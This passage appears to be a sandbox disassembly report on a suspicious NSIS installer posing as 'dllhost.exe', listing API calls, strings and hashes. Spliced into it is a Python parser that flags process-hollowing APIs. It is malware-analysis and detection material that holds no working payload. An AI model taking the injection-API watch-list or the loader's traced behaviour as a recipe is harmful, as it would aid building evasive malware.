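  • Part of subcall function 00405831: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 0040585A
  • Part of subcall function 00405831: CloseHandle.KERNEL32(?), ref: 00405867
  • Part of subcall function 004066D7: WaitForSingleObject.KERNEL32(?,00000064), ref: 004066E8
  • Part of subcall function 004066D7: GetExitCodeProcess.KERNEL32(?,?), ref: 0040670A
  • Part of subcall function 00406193: wsprintfW.USER32 ref: 004061A0
Memory Dump Source
• Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessageSend$CloseHandleProcesslstrlen
APIs
• GetDlgItem.USER32(?,000003F9), ref: 00404C44
• SendMessageW.USER32(?,00001109,00000002), ref: 00404D01
Memory Dump Source
"""

API_RE = re.compile(
    r"^\W*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})")
SOURCE_RE = re.compile(r"Source File:\s*(?P<name>\S+),\s*Offset:\s*(?P<base>[0-9A-Fa-f]+)")
APIID_RE = re.compile(r"API ID:\s*(?P<id>\S+)")

@dataclass
class ApiCall:
    api: str
    module: str
    args: list            # raw argument words: hex, '?' for unknown, or a literal string
    ref: int              # address of the call site
    subcall_of: int | None  # callee address when the call is reached indirectly

@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    pid: int | None = None         # assumption: first dotted field of the .sdmp name, hex
    image_base: int | None = None
    reported_api_id: str | None = None

def parse_report(text: str) -> list[FunctionRecord]:
    """Split the text at every 'APIs' header and collect the calls of each record."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        if (m := API_RE.match(line)):
            args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
            cur.calls.append(ApiCall(m["api"], m["mod"].upper(), args, int(m["ref"], 16),
                                     int(m["sub"], 16) if m["sub"] else None))
        elif (m := SOURCE_RE.search(line)):
            cur.pid = int(m["name"].split(".")[0], 16)
            cur.image_base = int(m["base"], 16)
        elif (m := APIID_RE.search(line)):
            cur.reported_api_id = m["id"]
    return records

# Documented Win32 dwCreationFlags bits that matter when hunting for hollowing.
CREATION_FLAGS = {
    0x00000004: "CREATE_SUSPENDED",
    0x00000008: "DETACHED_PROCESS",
    0x00000010: "CREATE_NEW_CONSOLE",
    0x00000400: "CREATE_UNICODE_ENVIRONMENT",
    0x04000000: "CREATE_DEFAULT_ERROR_MODE",
    0x08000000: "CREATE_NO_WINDOW",
}
WATCHLIST = {"CreateProcessW", "CreateProcessA", "WriteProcessMemory", "VirtualAllocEx",
             "SetThreadContext", "ResumeThread", "NtUnmapViewOfSection"}

def decode_creation_flags(value: int) -> list[str]:
    names = [name for bit, name in CREATION_FLAGS.items() if value & bit]
    rest = value & ~sum(CREATION_FLAGS)
    if rest:
        names.append(f"0x{rest:08X}")
    return names

def arg_int(word: str) -> int | None:
    """Hex words become ints; '?' and literal strings (e.g. error messages) become None."""
    try:
        return int(word, 16)
    except ValueError:
        return None

def flag_record(rec: FunctionRecord) -> list[tuple]:
    """Return (api, call site, callee, note) for every watch-listed call in the record."""
    hits = []
    for c in rec.calls:
        if c.api not in WATCHLIST:
            continue
        note = ""
        if c.api.startswith("CreateProcess") and len(c.args) > 5:   # 6th arg is dwCreationFlags
            flags = arg_int(c.args[5])
            if flags is not None:
                note = "|".join(decode_creation_flags(flags)) or "0"
        hits.append((c.api, c.ref, c.subcall_of, note))
    return hits

NOISE = {"Get", "Set", "For"}   # assumption: my own stoplist, not the report's rule

def api_tokens(name: str) -> list[str]:
    """Drop an A/W suffix, split CamelCase on capitals (underscores separate), drop noise words."""
    if len(name) > 1 and name[-1] in "AW" and name[-2].islower():
        name = name[:-1]
    return [t for t in re.findall(r"[A-Z][a-z0-9]*|[a-z][a-z0-9]*", name) if t not in NOISE]

def fingerprint(rec: FunctionRecord) -> str:
    """Tokens grouped by frequency (most frequent first), alphabetical inside a group, '$'-joined."""
    counts = Counter(t for c in rec.calls for t in api_tokens(c.api))
    groups: dict[int, list[str]] = {}
    for tok, n in counts.items():
        groups.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(groups[n])) for n in sorted(groups, reverse=True))

if __name__ == "__main__":
    for i, rec in enumerate(parse_report(SAMPLE)):
        print(f"record {i}: pid={rec.pid} base={rec.image_base:#x}" if rec.image_base
              else f"record {i}: no dump source")
        print("  fingerprint:", fingerprint(rec), "| reported:", rec.reported_api_id)
        for api, ref, callee, note in flag_record(rec):
            print(f"  WATCH {api} at {ref:08X} via {callee:08X} {note}")
```

Run against the record above that carries the `Error launching installer` string, the only watch-listed call is `CreateProcessW` reached through `00405831`, and its `dwCreationFlags` of `04000000` decodes to `CREATE_DEFAULT_ERROR_MODE` alone: `CREATE_SUSPENDED`, the usual first step of the hollowing the report signatures mention, is absent from this particular launch path, so that behaviour has to be looked for in other records. The parser accepts either bullet style and the no-parenthesis form used for `wsprintfW`; literal string arguments such as `[Rename]` or an error message survive as-is because `arg_int` refuses to treat them as hex.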
                                                                              APIs
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405ED3
                                                                              • GetShortPathNameW.KERNEL32(?,00426D88,00000400,?,?,00406033,?,?), ref: 00405EDC
                                                                                • Part of subcall function 00405CA3: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CB3
                                                                                • Part of subcall function 00405CA3: lstrlenA.KERNEL32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE5
                                                                              • GetShortPathNameW.KERNEL32(?,00427588,00000400,?,00000000,?,?,00406033,?,?), ref: 00405EF9
                                                                              • wsprintfA.USER32 ref: 00405F17
                                                                              • GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,00000004,00427588,?,?,?,?,?), ref: 00405F52
                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F61
                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F99
                                                                              • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00405FEF
                                                                              • GlobalFree.KERNEL32(00000000), ref: 00406000
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00406007
                                                                                • Part of subcall function 00405D3E: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\AppData\Roaming\dllhost.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                                                                • Part of subcall function 00405D3E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D64
Strings
Memory Dump Source
• Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
Similarity
• API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
• String ID: %ls=%ls$[Rename]
• API String ID: 2171350718-461813615
• Opcode ID: 8c66691bf4a5e84a4fbdc256dda6f1198a80262718252d540a2d4584cf418829
• Instruction ID: 4a393c650f5efb56d04c3c3372b5421d1ec1fa5455b413989d263a6ec4772352
• Opcode Fuzzy Hash: 8c66691bf4a5e84a4fbdc256dda6f1198a80262718252d540a2d4584cf418829
• Instruction Fuzzy Hash: 9E316870240B19BBD220ABA59E48F6B3A5CDF41758F15003BF946F72C2DA7CD8118ABD
APIs
• CoTaskMemFree.OLE32 ref: 004047E5
  • Part of subcall function 00405B1D: lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040332A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,7570D4C4,00403589,?,00000006,00000008,0000000A), ref: 00405B23
  • Part of subcall function 00405B1D: CharPrevW.USER32(?,00000000), ref: 00405B2D
  • Part of subcall function 00405B1D: lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B3F
• lstrcmpiW.KERNEL32(: Completed,?,00000000,?), ref: 00404817
• lstrcatW.KERNEL32(?,: Completed,?,00000000,?), ref: 00404823
• SetDlgItemTextW.USER32(?,000003FB), ref: 00404835
• GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,00000001,004216B8,?,?,000003FB,?,?,000003FB), ref: 004048F8
• MulDiv.KERNEL32 ref: 00404913
Strings
Memory Dump Source
• Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
Similarity
• API ID: Freelstrcat$CharDiskItemPrevSpaceTaskTextlstrcmpilstrlen
• String ID: : Completed$C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea
• API String ID: 611778071-2084225728
• Opcode ID: 1fa5789cdcb1e2cd980dcc05ec4352f4ddb055ac1aa6b3b5aaf3b34fcfb88657
• Instruction ID: 0d4a6a07d32540202bd103048eaebc2e62f3dbef9356839362eadbdc3d2543bd
• Opcode Fuzzy Hash: 1fa5789cdcb1e2cd980dcc05ec4352f4ddb055ac1aa6b3b5aaf3b34fcfb88657
• Instruction Fuzzy Hash: 6A5191F1A00209ABDB11AFA5CD45AAF76B8EF84315F10847BF601B62D1D73C9A418B6D
APIs
• lstrcatW.KERNEL32(00000000,00000000,Noncyclical,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea,?,?,00000031), ref: 004017B0
• CompareFileTime.KERNEL32(-00000014,?,Noncyclical,Noncyclical,00000000,00000000,Noncyclical,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea,?,?,00000031), ref: 004017D5
  • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259
  • Part of subcall function 004052B0: lstrlenW.KERNEL32(Completed,00000000,005A5ADC,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
  • Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,Completed,00000000,005A5ADC,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
  • Part of subcall function 004052B0: lstrcatW.KERNEL32(Completed,00403233,00403233,Completed,00000000,005A5ADC,00403094), ref: 0040530B
  • Part of subcall function 004052B0: SetWindowTextW.USER32(Completed,Completed,00000000,005A5ADC,00403094,?,?,?,?,?,?,?,?,?,00403233), ref: 0040531D
  • Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
  • Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
  • Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
Strings
Memory Dump Source
• Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
Similarity
• API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
• String ID: C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea$C:\Windows\Intragantes.geo$Noncyclical$sarcoderma
• API String ID: 1941528284-1377868196
• Opcode ID: badfc4f3729e7ae1c04d617a928de9c9f468a07c86b09933b1868ed5e72df1f0
• Instruction ID: a770c97b6a534c03b62b220807ae8b4c56d0338f794e1485d955ae8f7948b73c
• Opcode Fuzzy Hash: badfc4f3729e7ae1c04d617a928de9c9f468a07c86b09933b1868ed5e72df1f0
• Instruction Fuzzy Hash: 69419331900519BECF117BB5CD45DAF3A79EF45329B20827FF412B11E2CA3C8A619A6D
APIs
Strings
Memory Dump Source
• Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
Similarity
• API ID: Char$Next$Prev
• String ID: "C:\Users\user\AppData\Roaming\dllhost.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
• API String ID: 589700163-3050598723
• Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
• Instruction ID: 6610343985016d4d3861ed5752e28572e14021042ee5aa5e44fa789d85a72fac
• Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
• Instruction Fuzzy Hash: 0811B255800612A5DB303B14AD40AB7A2B8EF58794F52403FED9AB32C5E77C9C9286BD
APIs
• GetWindowLongW.USER32(?,000000EB), ref: 00404265
• GetSysColor.USER32(00000000,?), ref: 00404281
• SetTextColor.GDI32(?,00000000), ref: 0040428D
• SetBkMode.GDI32(?,?), ref: 00404299
• GetSysColor.USER32(?), ref: 004042AC
• SetBkColor.GDI32(?,?), ref: 004042BC
• DeleteObject.GDI32(?), ref: 004042D6
• CreateBrushIndirect.GDI32(?), ref: 004042E0
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                              • String ID:
                                                                              • API String ID: 2320649405-0
                                                                              • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                              • Instruction ID: 35b1f235034bf6ed7bc4b251198a1cd7c2be2f7e10ce7e0bcb7d9fbd5291f4f5
                                                                              • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                              • Instruction Fuzzy Hash: D7218471600704AFCB219F68DE08B4BBBF8AF41750B04897EFD95E26A0D734D904CB64
                                                                              APIs
                                                                              • ReadFile.KERNEL32(?,?,?,?), ref: 004026B0
                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724
                                                                                • Part of subcall function 00405E1F: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E35
                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
Similarity
• API ID: File$Pointer$ByteCharMultiWide$Read
• String ID: 9
• API String ID: 163830602-2366072709
APIs
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404B95
• GetMessagePos.USER32 ref: 00404B9D
• ScreenToClient.USER32(?,?), ref: 00404BB7
• SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BC9
• SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404BEF
Strings
Memory Dump Source
• Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
Similarity
• API ID: Message$Send$ClientScreen
• String ID: f
• API String ID: 41195575-1993550816
APIs
• GetDC.USER32(?), ref: 00401DB6
• GetDeviceCaps.GDI32(00000000,0000005A,00000048), ref: 00401DD0
• MulDiv.KERNEL32 ref: 00401DD8
• ReleaseDC.USER32(?,00000000), ref: 00401DE9
• CreateFontIndirectW.GDI32(0040CDB0), ref: 00401E38
Strings
Memory Dump Source
• Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
Similarity
• API ID: CapsCreateDeviceFontIndirectRelease
• String ID: Calibri
• API String ID: 3808545654-1409258342
APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
• MulDiv.KERNEL32 ref: 00402E20
• wsprintfW.USER32 ref: 00402E30
• SetWindowTextW.USER32(?,?), ref: 00402E40
• SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52
Strings
• verifying installer: %d%%, xrefs: 00402E2A
Memory Dump Source
• Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: verifying installer: %d%%
• API String ID: 1451636040-82062127
APIs
• GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
• GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
• GlobalFree.KERNEL32(?), ref: 00402950
• GlobalFree.KERNEL32(00000000), ref: 00402963
• CloseHandle.KERNEL32(?), ref: 0040297B
• DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F
Memory Dump Source
• Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
Similarity
• API ID: Global$AllocFree$CloseDeleteFileHandle
• String ID:
• API String ID: 2667972263-0
APIs
• lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,?,00000000,00000000,?,000000DC,00000000,?,000000DF), ref: 00404B0D
• wsprintfW.USER32 ref: 00404B16
• SetDlgItemTextW.USER32(?,004236E8), ref: 00404B29
Strings
Memory Dump Source
• Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
Similarity
• API ID: ItemTextlstrlenwsprintf
• String ID: %u.%u%s%s$6B
• API String ID: 3540041739-3884863406
APIs
• WideCharToMultiByte.KERNEL32(?,?,sarcoderma,000000FF,C:\Windows\Intragantes.geo,00000400,?,?,00000021), ref: 004025E2
• lstrlenA.KERNEL32(C:\Windows\Intragantes.geo,?,?,sarcoderma,000000FF,C:\Windows\Intragantes.geo,00000400,?,?,00000021), ref: 004025ED
Strings
Memory Dump Source
• Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
Similarity
• API ID: ByteCharMultiWidelstrlen
• String ID: C:\Windows\Intragantes.geo$sarcoderma
• API String ID: 3109718747-3933101654
APIs
• GetDlgItem.USER32(?,?), ref: 00401D5D
• GetClientRect.USER32(00000000,?), ref: 00401D6A
• LoadImageW.USER32 ref: 00401D8B
• SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
• DeleteObject.GDI32(00000000), ref: 00401DA8
Memory Dump Source
• Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                              • String ID:
                                                                              • API String ID: 1849352358-0
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040332A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,7570D4C4,00403589,?,00000006,00000008,0000000A), ref: 00405B23
                                                                              • CharPrevW.USER32(?,00000000), ref: 00405B2D
                                                                              • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B3F
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B1D
                                                                              Similarity
                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                              • API String ID: 2659869361-4017390910
                                                                              APIs
                                                                              • DestroyWindow.USER32 ref: 00402E70
                                                                              • GetTickCount.KERNEL32(00000000,0040303D,00000001,?,00000006,00000008,0000000A), ref: 00402E8E
                                                                              • CreateDialogParamW.USER32 ref: 00402EAB
                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402EB9
                                                                              Similarity
                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                              • String ID:
                                                                              • API String ID: 2102729457-0
                                                                              APIs
                                                                              • IsWindowVisible.USER32(?), ref: 00405253
                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 004052A4
                                                                                • Part of subcall function 0040422D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
                                                                              Similarity
                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                              • String ID:
                                                                              • API String ID: 3748168415-3916222277
